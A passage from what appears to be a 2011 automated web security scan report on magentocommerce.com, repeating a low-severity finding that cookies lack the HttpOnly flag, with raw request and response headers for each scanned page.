User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175938; expires=Sat, 11-Aug-2012 15:05:38 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Finterviews%2Ftimeout-online%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:39 GMT
Content-Length: 37701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.75. http://www.magentocommerce.com/media/interviews/tvonics/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/tvonics/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/tvonics/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175896; expires=Sat, 11-Aug-2012 15:04:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Finterviews%2Ftvonics%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:56 GMT
Content-Length: 41632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.76. http://www.magentocommerce.com/media/interviews/wander/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wander/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/wander/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175967; expires=Sat, 11-Aug-2012 15:06:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fmedia%2Finterviews%2Fwander%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:07 GMT
Content-Length: 40360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.77. http://www.magentocommerce.com/media/interviews/wearport/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wearport/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/wearport/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175899; expires=Sat, 11-Aug-2012 15:04:59 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Finterviews%2Fwearport%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:59 GMT
Content-Length: 38889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.78. http://www.magentocommerce.com/media/interviews/wkf-communications/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wkf-communications/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/wkf-communications/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175909; expires=Sat, 11-Aug-2012 15:05:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fwkf-communications%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:09 GMT
Content-Length: 39057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.79. http://www.magentocommerce.com/media/screencasts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/media/interviews
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170908; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.4.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171069; expires=Sat, 11-Aug-2012 13:44:29 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:29 GMT
Content-Length: 115374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.80. http://www.magentocommerce.com/media/screencasts/adding-related-products/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/adding-related-products/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/adding-related-products/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176075; expires=Sat, 11-Aug-2012 15:07:55 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fmedia%2Fscreencasts%2Fadding-related-products%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:55 GMT
Content-Length: 33267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.81. http://www.magentocommerce.com/media/screencasts/community-groups/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/community-groups/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/community-groups/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176027; expires=Sat, 11-Aug-2012 15:07:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fmedia%2Fscreencasts%2Fcommunity-groups%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:07 GMT
Content-Length: 33275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.82. http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configuring-tier-pricing/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/configuring-tier-pricing/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176151; expires=Sat, 11-Aug-2012 15:09:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fmedia%2Fscreencasts%2Fconfiguring-tier-pricing%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:11 GMT
Content-Length: 34931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.83. http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/content-staging-and-merging/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/content-staging-and-merging/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176016; expires=Sat, 11-Aug-2012 15:06:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A52%3A%22%2Fmedia%2Fscreencasts%2Fcontent-staging-and-merging%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:56 GMT
Content-Length: 33289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.84. http://www.magentocommerce.com/media/screencasts/currency/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/currency/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/currency/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176054; expires=Sat, 11-Aug-2012 15:07:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fmedia%2Fscreencasts%2Fcurrency%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:35 GMT
Content-Length: 34872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.85. http://www.magentocommerce.com/media/screencasts/data-exporting/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/data-exporting/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/data-exporting/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176046; expires=Sat, 11-Aug-2012 15:07:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fmedia%2Fscreencasts%2Fdata-exporting%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:26 GMT
Content-Length: 34645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.86. http://www.magentocommerce.com/media/screencasts/designers-guide-1/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/designers-guide-1/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/designers-guide-1/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176026; expires=Sat, 11-Aug-2012 15:07:06 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Fscreencasts%2Fdesigners-guide-1%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:06 GMT
Content-Length: 37478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.87. http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/gift-certificates-cards/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/gift-certificates-cards/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176002; expires=Sat, 11-Aug-2012 15:06:42 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fmedia%2Fscreencasts%2Fgift-certificates-cards%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:43 GMT
Content-Length: 33319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.88. http://www.magentocommerce.com/media/screencasts/grouped-products/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/grouped-products/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/grouped-products/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176154; expires=Sat, 11-Aug-2012 15:09:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fmedia%2Fscreencasts%2Fgrouped-products%2Fview%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A4%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:15 GMT
Content-Length: 33124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.89. http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/introducing-the-magento-enterprise-edition/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/introducing-the-magento-enterprise-edition/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
